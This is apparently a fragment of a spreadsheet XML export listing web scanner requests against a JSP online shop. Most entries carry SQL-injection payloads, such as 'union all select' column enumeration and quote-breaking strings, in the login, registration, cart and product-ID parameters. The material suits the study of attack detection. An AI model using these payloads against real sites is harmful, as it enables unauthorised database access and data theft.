    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128,9128--and('iupz'like'iupz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486,9486--and('ohpn'like'ohpn</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501,1501--and('epci'like'epci</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351,8351--and('ueid'like'ueid</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703,8703--and('wphi'like'wphi</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769--and('sljq'like'sljq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981--and('lilt'like'lilt</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606,9606--and('sfcc'like'sfcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647,6647--and('vtdm'like'vtdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('rmix'like'rmix</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('cqqz'like'cqqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('cdpw'like'cdpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('lunh'like'lunh</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('qzqf'like'qzqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('hfkp'like'hfkp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ajao'like'ajao</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('kuhh'like'kuhh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--and('lkjc'like'lkjc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--and('vlom'like'vlom</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613,4613--and('mnce'like'mnce</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065,5065--and('pebf'like'pebf</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889,9889--and('jpxj'like'jpxj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063,6063--and('dbex'like'dbex</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017,7017--and('tnkq'like'tnkq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291,8291--and('nfta'like'nfta</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679,1679--and('vmhm'like'vmhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560--and('wxlq'like'wxlq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006,3006--and('cpbr'like'cpbr</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129,7129--and('ognv'like'ognv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--and('dnra'like'dnra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--and('wgsz'like'wgsz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--and('lpmg'like'lpmg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--and('ltkn'like'ltkn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--and('lscs'like'lscs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--and('opgm'like'opgm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,null--and('zefa'like'zefa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,null,null--and('qmus'like'qmus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,null,null,null--and('hvdm'like'hvdm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('omqd'like'omqd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491,1491--and('wmvr'like'wmvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187,9187--and('veam'like'veam</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908,8908--and('llyu'like'llyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498,7498--and('uwpu'like'uwpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014,9014--and('dgev'like'dgev</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510,8510--and('ddvz'like'ddvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931,3931--and('ykjm'like'ykjm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933,3933--and('tady'like'tady</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287,6287--and('dyis'like'dyis</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652,4652--and('evrn'like'evrn</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')and(48+54)=102and('unla'like'unla</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=d'z"0&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=d'z"0&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=d'z"0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d'z"0&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=d'z"0&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=d'z"0&amp;provincia=50&amp;dni=56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d'z"0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w3af@email.com&amp;login=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=d'z"0&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=d'z"0&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=d'z"0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d'z"0&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=d'z"0&amp;dni=56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d'z"0&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=d'z"0&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=d'z"0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d'z"0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d'z"0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d'z"0&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=d'z"0&amp;provincia=0&amp;login=56&amp;dni=56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56&amp;email=d'z"0&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=d'z"0&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=d'z"0&amp;login=56&amp;dni=56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56&amp;email=w3af@email.com&amp;modo=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=d'z"0&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=d'z"0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d'z"0&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=d'z"0&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=d'z"0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56&amp;email=w3af@email.com&amp;modo=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=d'z"0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d'z"0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d'z"0&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=d'z"0&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=d'z"0&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=d'z"0&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=d'z"0&amp;precio=85&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=d'z"0&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=d'z"0&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=d'z"0&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=d'z"0&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=d'z"0&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=d'z"0&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=d'z"0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frame30.&amp;email=d'z"0&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=d'z"0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frame30.&amp;email=w3af@email.com&amp;login=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=d'z"0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d'z"0&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=d'z"0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d'z"0&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=d'z"0&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=d'z"0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=d'z"0&amp;provincia=50&amp;dni=56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d'z"0&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=d'z"0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d'z"0&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=d'z"0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d'z"0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d'z"0&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=d'z"0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w3af@email.com&amp;modo=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=d'z"0&amp;login=56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d'z"0&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=d'z"0&amp;provincia=0&amp;login=56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d'z"0&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=d'z"0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d'z"0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d'z"0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d'z"0&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=d'z"0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56&amp;email=w3af@email.com&amp;modo=d'z"0</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=d'z"0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d'z"0&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=d'z"0&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=d'z"0&amp;provincia=24&amp;login=56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d'z"0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56&amp;email=d'z"0&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=^(#$!@#$)(()))******&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=^(#$!@#$)(()))******&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=^(#$!@#$)(()))******&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&amp;pwd=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=^(#$!@#$)(()))******&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=^(#$!@#$)(()))******&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=^(#$!@#$)(()))******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^(#$!@#$)(()))******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^(#$!@#$)(()))******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^(#$!@#$)(()))******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w3af@email.com&amp;login=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&amp;provincia=0&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;modo=registro&amp;nombre=&amp;ntc=&amp;password=&amp;email=&amp;login=</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=^(#$!@#$)(()))******&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=^(#$!@#$)(()))******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^(#$!@#$)(()))******&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=^(#$!@#$)(()))******&amp;login=56&amp;dni=56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^(#$!@#$)(()))******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56&amp;email=w3af@email.com&amp;modo=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&amp;provincia=24&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;modo=registro&amp;nombre=&amp;ntc=&amp;password=&amp;email=&amp;login=</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=^(#$!@#$)(()))******&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=^(#$!@#$)(()))******&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=^(#$!@#$)(()))******&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=^(#$!@#$)(()))******&amp;provincia=24&amp;login=56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56&amp;email=^(#$!@#$)(()))******&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=^(#$!@#$)(()))******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56&amp;email=w3af@email.com&amp;modo=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=^(#$!@#$)(()))******&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=^(#$!@#$)(()))******&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=^(#$!@#$)(()))******&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=^(#$!@#$)(()))******</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=^(#$!@#$)(()))******&amp;cantidad=1</t>
  </si>
  <si>
